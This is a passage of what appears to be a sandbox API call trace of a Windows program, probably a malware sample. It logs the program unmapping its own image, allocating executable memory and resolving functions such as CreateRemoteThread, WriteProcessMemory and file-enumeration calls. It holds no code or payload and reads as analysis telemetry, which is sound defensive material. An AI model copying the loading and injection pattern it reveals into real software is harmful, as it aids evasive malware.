lpProcName="VirtualAllocEx") returned 0x759ed9b0 [0327.979] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x240000 [0327.979] GetAdaptersInfo (in: AdapterInfo=0x240000, SizePointer=0x18f54c | out: AdapterInfo=0x240000, SizePointer=0x18f54c) returned 0x0 [0327.995] SetErrorMode (uMode=0x8001) returned 0x0 [0327.995] LoadLibraryA (lpLibFileName="shell32") returned 0x76a70000 [0327.995] SetErrorMode (uMode=0x0) returned 0x8001 [0327.995] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteA") returned 0x76cb7078 [0327.996] SetErrorMode (uMode=0x8001) returned 0x0 [0327.996] LoadLibraryA (lpLibFileName="User32") returned 0x758c0000 [0327.996] SetErrorMode (uMode=0x0) returned 0x8001 [0327.996] GetProcAddress (hModule=0x758c0000, lpProcName="EnumWindows") returned 0x758dd1cf [0327.996] EnumWindows (lpEnumFunc=0x514c9a, lParam=0x18f5f0) returned 1 [0327.997] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x8000000, flAllocationType=0x3000, flProtect=0x40) returned 0x3630000 [0328.003] SetErrorMode (uMode=0x8001) returned 0x0 [0328.003] LoadLibraryA (lpLibFileName="user32") returned 0x758c0000 [0328.003] SetErrorMode (uMode=0x0) returned 0x8001 [0328.003] GetProcAddress (hModule=0x758c0000, lpProcName="DestroyWindow") returned 0x758d9a55 [0328.003] SetErrorMode (uMode=0x8001) returned 0x0 [0328.003] LoadLibraryA (lpLibFileName="user32") returned 0x758c0000 [0328.003] SetErrorMode (uMode=0x0) returned 0x8001 [0328.003] GetProcAddress (hModule=0x758c0000, lpProcName="EnumThreadWindows") returned 0x758e3961 [0328.003] EnumThreadWindows (dwThreadId=0x548, lpfn=0x514dc5, lParam=0x758d9a55) returned 0 [0328.003] DestroyWindow (hWnd=0x20108) returned 1 [0328.003] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0328.003] SendMessageA (hWnd=0x20108, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0328.003] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0328.004] SelectObject (hdc=0x11010268, h=0x18a002e) returned 0x170a021e [0328.004] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0328.004] SelectObject (hdc=0x11010268, h=0x18a002e) returned 0x18a002e [0328.004] SelectObject (hdc=0x70107bb, h=0x2630079f) returned 0x1b00016 [0328.004] SelectObject (hdc=0x70107bb, h=0x170a021e) returned 0x18a002e [0328.004] SelectObject (hdc=0x70107bb, h=0x1900011) returned 0x1900015 [0328.004] SetBrushOrgEx (in: hdc=0x70107bb, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0328.004] UnrealizeObject (h=0x1900015) returned 1 [0328.004] SelectObject (hdc=0x70107bb, h=0x1900015) returned 0x1900011 [0328.004] SetBkMode (hdc=0x70107bb, mode=1) returned 1 [0328.004] OleTranslateColor () returned 0x0 [0328.004] SetBkColor (hdc=0x70107bb, color=0xf0f0f0) returned 0xf0f0f0 [0328.004] OleTranslateColor () returned 0x0 [0328.004] SetTextColor (hdc=0x70107bb, color=0x0) returned 0x0 [0328.004] GetROP2 (hdc=0x11010268) returned 13 [0328.004] SetROP2 (hdc=0x70107bb, rop2=13) returned 13 [0328.004] SelectObject (hdc=0x11010268, h=0x1b00016) returned 0x2630079f [0328.004] SelectObject (hdc=0x11010268, h=0x18a002e) returned 0x18a002e [0328.004] SelectObject (hdc=0x11010268, h=0x1900015) returned 0x1900015 [0328.004] SelectPalette (hdc=0x11010268, hPal=0x188000b, bForceBkgd=1) returned 0x188000b [0328.005] DeleteDC (hdc=0x11010268) returned 1 [0328.005] SelectObject (hdc=0x70107bb, h=0x1b00016) returned 0x2630079f [0328.005] DeleteObject (ho=0x2630079f) returned 1 [0328.005] SelectObject (hdc=0x70107bb, h=0x1900015) returned 0x1900015 [0328.005] SelectObject (hdc=0x70107bb, h=0x1900015) returned 0x1900015 [0328.005] ReleaseDC (hWnd=0x20108, hDC=0x70107bb) returned 1 [0328.005] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0328.005] UnmapViewOfFile (lpBaseAddress=0x400000) returned 1 [0328.006] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x400000, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0328.007] SetErrorMode (uMode=0x8001) returned 0x0 [0328.007] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.007] SetErrorMode (uMode=0x0) returned 0x8001 [0328.007] GetProcAddress (hModule=0x759c0000, lpProcName="TerminateThread") returned 0x759d7a2f [0328.007] SetErrorMode (uMode=0x8001) returned 0x0 [0328.007] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.007] SetErrorMode (uMode=0x0) returned 0x8001 [0328.007] GetProcAddress (hModule=0x759c0000, lpProcName="LoadLibraryA") returned 0x759d49d7 [0328.007] SetErrorMode (uMode=0x8001) returned 0x0 [0328.007] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.007] SetErrorMode (uMode=0x0) returned 0x8001 [0328.007] GetProcAddress (hModule=0x759c0000, lpProcName="DeleteFileW") returned 0x759d89b3 [0328.007] SetErrorMode (uMode=0x8001) returned 0x0 [0328.007] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.007] SetErrorMode (uMode=0x0) returned 0x8001 [0328.008] GetProcAddress (hModule=0x759c0000, lpProcName="HeapReAlloc") returned 0x77cf1f6e [0328.008] SetErrorMode (uMode=0x8001) returned 0x0 [0328.008] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.008] SetErrorMode (uMode=0x0) returned 0x8001 [0328.008] GetProcAddress (hModule=0x759c0000, lpProcName="GetNativeSystemInfo") returned 0x759e10b5 [0328.008] SetErrorMode (uMode=0x8001) returned 0x0 [0328.008] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.008] SetErrorMode (uMode=0x0) returned 0x8001 [0328.008] GetProcAddress (hModule=0x759c0000, lpProcName="CreateThread") returned 0x759d34d5 [0328.008] SetErrorMode (uMode=0x8001) returned 0x0 [0328.008] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.008] SetErrorMode (uMode=0x0) returned 0x8001 [0328.008] GetProcAddress (hModule=0x759c0000, lpProcName="HeapAlloc") returned 0x77cde026 [0328.008] SetErrorMode (uMode=0x8001) returned 0x0 [0328.008] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.008] SetErrorMode (uMode=0x0) returned 0x8001 [0328.008] GetProcAddress (hModule=0x759c0000, lpProcName="HeapDestroy") returned 0x759d35b7 [0328.008] SetErrorMode (uMode=0x8001) returned 0x0 [0328.008] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.009] SetErrorMode (uMode=0x0) returned 0x8001 [0328.009] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAllocEx") returned 0x759ed9b0 [0328.009] SetErrorMode (uMode=0x8001) returned 0x0 [0328.009] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.009] SetErrorMode (uMode=0x0) returned 0x8001 [0328.009] GetProcAddress (hModule=0x759c0000, lpProcName="LocalFree") returned 0x759d2d3c [0328.009] SetErrorMode (uMode=0x8001) returned 0x0 [0328.009] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.009] SetErrorMode (uMode=0x0) returned 0x8001 [0328.009] GetProcAddress (hModule=0x759c0000, lpProcName="DeleteCriticalSection") returned 0x77ce45f5 [0328.009] SetErrorMode (uMode=0x8001) returned 0x0 [0328.009] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.009] SetErrorMode (uMode=0x0) returned 0x8001 [0328.009] GetProcAddress (hModule=0x759c0000, lpProcName="GetComputerNameW") returned 0x759ddd0e [0328.009] SetErrorMode (uMode=0x8001) returned 0x0 [0328.009] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.009] SetErrorMode (uMode=0x0) returned 0x8001 [0328.010] GetProcAddress (hModule=0x759c0000, lpProcName="GetProcessHeap") returned 0x759d14e9 [0328.010] SetErrorMode (uMode=0x8001) returned 0x0 [0328.010] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.010] SetErrorMode (uMode=0x0) returned 0x8001 [0328.010] GetProcAddress (hModule=0x759c0000, lpProcName="SystemTimeToFileTime") returned 0x759d5a7e [0328.010] SetErrorMode (uMode=0x8001) returned 0x0 [0328.010] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.010] SetErrorMode (uMode=0x0) returned 0x8001 [0328.010] GetProcAddress (hModule=0x759c0000, lpProcName="GlobalMemoryStatusEx") returned 0x759fd4c4 [0328.010] SetErrorMode (uMode=0x8001) returned 0x0 [0328.010] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.010] SetErrorMode (uMode=0x0) returned 0x8001 [0328.010] GetProcAddress (hModule=0x759c0000, lpProcName="CreateProcessW") returned 0x759d103d [0328.010] SetErrorMode (uMode=0x8001) returned 0x0 [0328.010] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.010] SetErrorMode (uMode=0x0) returned 0x8001 [0328.011] GetProcAddress (hModule=0x759c0000, lpProcName="WideCharToMultiByte") returned 0x759d170d [0328.011] SetErrorMode (uMode=0x8001) returned 0x0 [0328.011] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.011] SetErrorMode (uMode=0x0) returned 0x8001 [0328.011] GetProcAddress (hModule=0x759c0000, lpProcName="InterlockedIncrement") returned 0x759d1400 [0328.011] SetErrorMode (uMode=0x8001) returned 0x0 [0328.011] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.011] SetErrorMode (uMode=0x0) returned 0x8001 [0328.011] GetProcAddress (hModule=0x759c0000, lpProcName="GetSystemTime") returned 0x759d5a96 [0328.011] SetErrorMode (uMode=0x8001) returned 0x0 [0328.011] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.011] SetErrorMode (uMode=0x0) returned 0x8001 [0328.011] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualFreeEx") returned 0x759ed9c8 [0328.011] SetErrorMode (uMode=0x8001) returned 0x0 [0328.011] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.011] SetErrorMode (uMode=0x0) returned 0x8001 [0328.011] GetProcAddress (hModule=0x759c0000, lpProcName="IsBadReadPtr") returned 0x759fd075 [0328.011] SetErrorMode (uMode=0x8001) returned 0x0 [0328.012] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.012] SetErrorMode (uMode=0x0) returned 0x8001 [0328.012] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpiW") returned 0x759ed5cd [0328.012] SetErrorMode (uMode=0x8001) returned 0x0 [0328.012] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.012] SetErrorMode (uMode=0x0) returned 0x8001 [0328.012] GetProcAddress (hModule=0x759c0000, lpProcName="OpenMutexW") returned 0x759d5151 [0328.012] SetErrorMode (uMode=0x8001) returned 0x0 [0328.012] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.012] SetErrorMode (uMode=0x0) returned 0x8001 [0328.012] GetProcAddress (hModule=0x759c0000, lpProcName="SetEndOfFile") returned 0x759ece2e [0328.012] SetErrorMode (uMode=0x8001) returned 0x0 [0328.012] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.012] SetErrorMode (uMode=0x0) returned 0x8001 [0328.012] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentThread") returned 0x759d17ec [0328.012] SetErrorMode (uMode=0x8001) returned 0x0 [0328.012] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.012] SetErrorMode (uMode=0x0) returned 0x8001 [0328.013] GetProcAddress (hModule=0x759c0000, lpProcName="FlushFileBuffers") returned 0x759d469b [0328.013] SetErrorMode (uMode=0x8001) returned 0x0 [0328.013] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.013] SetErrorMode (uMode=0x0) returned 0x8001 [0328.013] GetProcAddress (hModule=0x759c0000, lpProcName="RemoveVectoredExceptionHandler") returned 0x77d25f41 [0328.013] SetErrorMode (uMode=0x8001) returned 0x0 [0328.013] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.013] SetErrorMode (uMode=0x0) returned 0x8001 [0328.013] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentProcess") returned 0x759d1809 [0328.013] SetErrorMode (uMode=0x8001) returned 0x0 [0328.013] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.013] SetErrorMode (uMode=0x0) returned 0x8001 [0328.013] GetProcAddress (hModule=0x759c0000, lpProcName="SetErrorMode") returned 0x759d1b00 [0328.013] SetErrorMode (uMode=0x8001) returned 0x0 [0328.013] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.014] SetErrorMode (uMode=0x0) returned 0x8001 [0328.014] GetProcAddress (hModule=0x759c0000, lpProcName="GetVersionExW") returned 0x759d1ae5 [0328.014] SetErrorMode (uMode=0x8001) returned 0x0 [0328.014] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.014] SetErrorMode (uMode=0x0) returned 0x8001 [0328.014] GetProcAddress (hModule=0x759c0000, lpProcName="DuplicateHandle") returned 0x759d1886 [0328.014] SetErrorMode (uMode=0x8001) returned 0x0 [0328.014] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.014] SetErrorMode (uMode=0x0) returned 0x8001 [0328.014] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleHandleA") returned 0x759d1245 [0328.014] SetErrorMode (uMode=0x8001) returned 0x0 [0328.014] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.014] SetErrorMode (uMode=0x0) returned 0x8001 [0328.014] GetProcAddress (hModule=0x759c0000, lpProcName="AddVectoredExceptionHandler") returned 0x77d2742b [0328.014] SetErrorMode (uMode=0x8001) returned 0x0 [0328.014] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.014] SetErrorMode (uMode=0x0) returned 0x8001 [0328.015] GetProcAddress (hModule=0x759c0000, lpProcName="ExitProcess") returned 0x759d7a10 [0328.015] SetErrorMode (uMode=0x8001) returned 0x0 [0328.015] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.015] SetErrorMode (uMode=0x0) returned 0x8001 [0328.015] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentProcessId") returned 0x759d11f8 [0328.015] SetErrorMode (uMode=0x8001) returned 0x0 [0328.015] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.015] SetErrorMode (uMode=0x0) returned 0x8001 [0328.015] GetProcAddress (hModule=0x759c0000, lpProcName="CopyFileW") returned 0x759f830d [0328.015] SetErrorMode (uMode=0x8001) returned 0x0 [0328.015] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.015] SetErrorMode (uMode=0x0) returned 0x8001 [0328.015] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpiA") returned 0x759d3e8e [0328.015] SetErrorMode (uMode=0x8001) returned 0x0 [0328.015] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.015] SetErrorMode (uMode=0x0) returned 0x8001 [0328.015] GetProcAddress (hModule=0x759c0000, lpProcName="IsWow64Process") returned 0x759d195e [0328.015] SetErrorMode (uMode=0x8001) returned 0x0 [0328.016] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.016] SetErrorMode (uMode=0x0) returned 0x8001 [0328.016] GetProcAddress (hModule=0x759c0000, lpProcName="FindFirstChangeNotificationW") returned 0x759ed851 [0328.016] SetErrorMode (uMode=0x8001) returned 0x0 [0328.016] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.016] SetErrorMode (uMode=0x0) returned 0x8001 [0328.016] GetProcAddress (hModule=0x759c0000, lpProcName="FindNextChangeNotification") returned 0x759f5c1e [0328.016] SetErrorMode (uMode=0x8001) returned 0x0 [0328.016] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.016] SetErrorMode (uMode=0x0) returned 0x8001 [0328.016] GetProcAddress (hModule=0x759c0000, lpProcName="IsProcessInJob") returned 0x759fc7ea [0328.016] SetErrorMode (uMode=0x8001) returned 0x0 [0328.016] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.016] SetErrorMode (uMode=0x0) returned 0x8001 [0328.016] GetProcAddress (hModule=0x759c0000, lpProcName="CreateRemoteThread") returned 0x75a5416b [0328.016] SetErrorMode (uMode=0x8001) returned 0x0 [0328.016] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.017] SetErrorMode (uMode=0x0) returned 0x8001 [0328.017] GetProcAddress (hModule=0x759c0000, lpProcName="CreateNamedPipeW") returned 0x75a5414b [0328.017] SetErrorMode (uMode=0x8001) returned 0x0 [0328.017] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.017] SetErrorMode (uMode=0x0) returned 0x8001 [0328.017] GetProcAddress (hModule=0x759c0000, lpProcName="DisconnectNamedPipe") returned 0x75a541df [0328.017] SetErrorMode (uMode=0x8001) returned 0x0 [0328.017] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.017] SetErrorMode (uMode=0x0) returned 0x8001 [0328.017] GetProcAddress (hModule=0x759c0000, lpProcName="ConnectNamedPipe") returned 0x75a540fb [0328.017] SetErrorMode (uMode=0x8001) returned 0x0 [0328.017] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.017] SetErrorMode (uMode=0x0) returned 0x8001 [0328.017] GetProcAddress (hModule=0x759c0000, lpProcName="GetLogicalDrives") returned 0x759d5371 [0328.017] SetErrorMode (uMode=0x8001) returned 0x0 [0328.017] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.017] SetErrorMode (uMode=0x0) returned 0x8001 [0328.018] GetProcAddress (hModule=0x759c0000, lpProcName="GetDriveTypeW") returned 0x759d418b [0328.018] SetErrorMode (uMode=0x8001) returned 0x0 [0328.018] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.018] SetErrorMode (uMode=0x0) returned 0x8001 [0328.018] GetProcAddress (hModule=0x759c0000, lpProcName="GetUserDefaultUILanguage") returned 0x759d44ab [0328.018] SetErrorMode (uMode=0x8001) returned 0x0 [0328.018] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.018] SetErrorMode (uMode=0x0) returned 0x8001 [0328.018] GetProcAddress (hModule=0x759c0000, lpProcName="CopyFileExW") returned 0x759f3b92 [0328.018] SetErrorMode (uMode=0x8001) returned 0x0 [0328.018] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.018] SetErrorMode (uMode=0x0) returned 0x8001 [0328.018] GetProcAddress (hModule=0x759c0000, lpProcName="GetEnvironmentVariableW") returned 0x759d1b48 [0328.018] SetErrorMode (uMode=0x8001) returned 0x0 [0328.018] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.018] SetErrorMode (uMode=0x0) returned 0x8001 [0328.018] GetProcAddress (hModule=0x759c0000, lpProcName="SetFilePointer") returned 0x759d17d1 [0328.018] SetErrorMode (uMode=0x8001) returned 0x0 [0328.018] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.019] SetErrorMode (uMode=0x0) returned 0x8001 [0328.019] GetProcAddress (hModule=0x759c0000, lpProcName="InitializeCriticalSection") returned 0x77ce2c42 [0328.019] SetErrorMode (uMode=0x8001) returned 0x0 [0328.019] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.019] SetErrorMode (uMode=0x0) returned 0x8001 [0328.019] GetProcAddress (hModule=0x759c0000, lpProcName="GetTimeZoneInformation") returned 0x759d465a [0328.019] SetErrorMode (uMode=0x8001) returned 0x0 [0328.019] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.019] SetErrorMode (uMode=0x0) returned 0x8001 [0328.019] GetProcAddress (hModule=0x759c0000, lpProcName="MultiByteToWideChar") returned 0x759d192e [0328.019] SetErrorMode (uMode=0x8001) returned 0x0 [0328.019] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.019] SetErrorMode (uMode=0x0) returned 0x8001 [0328.019] GetProcAddress (hModule=0x759c0000, lpProcName="SetFileAttributesW") returned 0x759ed4f7 [0328.019] SetErrorMode (uMode=0x8001) returned 0x0 [0328.019] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.019] SetErrorMode (uMode=0x0) returned 0x8001 [0328.020] GetProcAddress (hModule=0x759c0000, lpProcName="GetVolumeNameForVolumeMountPointW") returned 0x759e052f [0328.020] SetErrorMode (uMode=0x8001) returned 0x0 [0328.020] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.020] SetErrorMode (uMode=0x0) returned 0x8001 [0328.020] GetProcAddress (hModule=0x759c0000, lpProcName="OpenProcess") returned 0x759d1986 [0328.020] SetErrorMode (uMode=0x8001) returned 0x0 [0328.020] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.020] SetErrorMode (uMode=0x0) returned 0x8001 [0328.020] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileTime") returned 0x759d4407 [0328.020] SetErrorMode (uMode=0x8001) returned 0x0 [0328.020] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.020] SetErrorMode (uMode=0x0) returned 0x8001 [0328.020] GetProcAddress (hModule=0x759c0000, lpProcName="ReleaseMutex") returned 0x759d111e [0328.020] SetErrorMode (uMode=0x8001) returned 0x0 [0328.020] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.020] SetErrorMode (uMode=0x0) returned 0x8001 [0328.020] GetProcAddress (hModule=0x759c0000, lpProcName="LeaveCriticalSection") returned 0x77cd2270 [0328.020] SetErrorMode (uMode=0x8001) returned 0x0 [0328.021] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.021] SetErrorMode (uMode=0x0) returned 0x8001 [0328.021] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleFileNameW") returned 0x759d4950 [0328.021] SetErrorMode (uMode=0x8001) returned 0x0 [0328.021] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.021] SetErrorMode (uMode=0x0) returned 0x8001 [0328.021] GetProcAddress (hModule=0x759c0000, lpProcName="SetFileTime") returned 0x759eecbb [0328.021] SetErrorMode (uMode=0x8001) returned 0x0 [0328.021] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.021] SetErrorMode (uMode=0x0) returned 0x8001 [0328.021] GetProcAddress (hModule=0x759c0000, lpProcName="RemoveDirectoryW") returned 0x75a544cf [0328.021] SetErrorMode (uMode=0x8001) returned 0x0 [0328.021] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.021] SetErrorMode (uMode=0x0) returned 0x8001 [0328.021] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAlloc") returned 0x759d1856 [0328.021] SetErrorMode (uMode=0x8001) returned 0x0 [0328.021] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.022] SetErrorMode (uMode=0x0) returned 0x8001 [0328.022] GetProcAddress (hModule=0x759c0000, lpProcName="ExpandEnvironmentStringsW") returned 0x759d4173 [0328.022] SetErrorMode (uMode=0x8001) returned 0x0 [0328.022] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.022] SetErrorMode (uMode=0x0) returned 0x8001 [0328.022] GetProcAddress (hModule=0x759c0000, lpProcName="WriteFile") returned 0x759d1282 [0328.022] SetErrorMode (uMode=0x8001) returned 0x0 [0328.022] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.022] SetErrorMode (uMode=0x0) returned 0x8001 [0328.022] GetProcAddress (hModule=0x759c0000, lpProcName="FindNextFileW") returned 0x759d54ee [0328.022] SetErrorMode (uMode=0x8001) returned 0x0 [0328.022] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.022] SetErrorMode (uMode=0x0) returned 0x8001 [0328.022] GetProcAddress (hModule=0x759c0000, lpProcName="EnterCriticalSection") returned 0x77cd22b0 [0328.022] SetErrorMode (uMode=0x8001) returned 0x0 [0328.022] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.022] SetErrorMode (uMode=0x0) returned 0x8001 [0328.023] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileAttributesW") returned 0x759d1b18 [0328.023] SetErrorMode (uMode=0x8001) returned 0x0 [0328.023] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.023] SetErrorMode (uMode=0x0) returned 0x8001 [0328.023] GetProcAddress (hModule=0x759c0000, lpProcName="FindClose") returned 0x759d4442 [0328.023] SetErrorMode (uMode=0x8001) returned 0x0 [0328.023] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.023] SetErrorMode (uMode=0x0) returned 0x8001 [0328.023] GetProcAddress (hModule=0x759c0000, lpProcName="OpenEventW") returned 0x759d15d6 [0328.023] SetErrorMode (uMode=0x8001) returned 0x0 [0328.023] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.023] SetErrorMode (uMode=0x0) returned 0x8001 [0328.023] GetProcAddress (hModule=0x759c0000, lpProcName="GetTempPathW") returned 0x759ed4dc [0328.023] SetErrorMode (uMode=0x8001) returned 0x0 [0328.023] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.023] SetErrorMode (uMode=0x0) returned 0x8001 [0328.023] GetProcAddress (hModule=0x759c0000, lpProcName="SetLastError") returned 0x759d11a9 [0328.023] SetErrorMode (uMode=0x8001) returned 0x0 [0328.023] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.024] SetErrorMode (uMode=0x0) returned 0x8001 [0328.024] GetProcAddress (hModule=0x759c0000, lpProcName="HeapFree") returned 0x759d14c9 [0328.024] SetErrorMode (uMode=0x8001) returned 0x0 [0328.024] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.024] SetErrorMode (uMode=0x0) returned 0x8001 [0328.024] GetProcAddress (hModule=0x759c0000, lpProcName="HeapCreate") returned 0x759d4a2d [0328.024] SetErrorMode (uMode=0x8001) returned 0x0 [0328.024] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.024] SetErrorMode (uMode=0x0) returned 0x8001 [0328.024] GetProcAddress (hModule=0x759c0000, lpProcName="WriteProcessMemory") returned 0x759ed9e0 [0328.024] SetErrorMode (uMode=0x8001) returned 0x0 [0328.024] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.024] SetErrorMode (uMode=0x0) returned 0x8001 [0328.024] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileSizeEx") returned 0x759d59e2 [0328.024] SetErrorMode (uMode=0x8001) returned 0x0 [0328.024] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.024] SetErrorMode (uMode=0x0) returned 0x8001 [0328.025] GetProcAddress (hModule=0x759c0000, lpProcName="FindFirstFileW") returned 0x759d4435 [0328.025] SetErrorMode (uMode=0x8001) returned 0x0 [0328.025] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.025] SetErrorMode (uMode=0x0) returned 0x8001 [0328.025] GetProcAddress (hModule=0x759c0000, lpProcName="InterlockedExchange") returned 0x759d1462 [0328.025] SetErrorMode (uMode=0x8001) returned 0x0 [0328.025] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.025] SetErrorMode (uMode=0x0) returned 0x8001 [0328.025] GetProcAddress (hModule=0x759c0000, lpProcName="GetVolumeInformationW") returned 0x759ec860 [0328.025] SetErrorMode (uMode=0x8001) returned 0x0 [0328.025] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.025] SetErrorMode (uMode=0x0) returned 0x8001 [0328.025] GetProcAddress (hModule=0x759c0000, lpProcName="ReadFile") returned 0x759d3ed3 [0328.025] SetErrorMode (uMode=0x8001) returned 0x0 [0328.025] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.025] SetErrorMode (uMode=0x0) returned 0x8001 [0328.025] GetProcAddress (hModule=0x759c0000, lpProcName="CreateDirectoryW") returned 0x759d4259 [0328.025] SetErrorMode (uMode=0x8001) returned 